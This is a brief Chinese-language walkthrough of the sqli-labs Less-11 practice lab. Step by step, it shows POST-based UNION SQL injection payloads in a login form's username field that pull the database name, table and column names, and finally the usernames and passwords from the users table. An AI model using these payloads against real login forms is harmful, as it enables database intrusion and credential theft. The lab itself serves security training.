sqli-labs less11 POST注入
注入工具:burp
(1)判断类型:
burp抓包,看到传参admin,是可以正常显示的:
and 1 = 1
异常,估计不是数字型
尝试单引号:
报错了,好征兆
and 1=1 --+
and 1 = 2 --+
由此,断定这个字符型 的闭合就是’
(2)判断字段个数:
order by 1回显正常
order by 2回显正常
order by 3回显错误
判断字段个数是2个
(3)判断回显位置:
显然,两个回显位置都可以
(4)爆数据库名:
uname=-1 ’ union select 1,database() --+ &passwd=admin&submit=Submit
数据库名:security
(5)数据表名:
uname=-1 ’ union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() --+ &passwd=admin&submit=Submit
数据表名:
emails,referers,uagents,users
(6)挑选数据表users进行查询:
uname=-1 ’ union select 1,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘users’ --+ &passwd=admin&submit=Submit
查询到字段:
id,username,password
(7)爆数据:
uname=-1 ’ union select 1,group_concat(id,0x3a,username,0x3a,password) from users --+ &passwd=admin&submit=Submit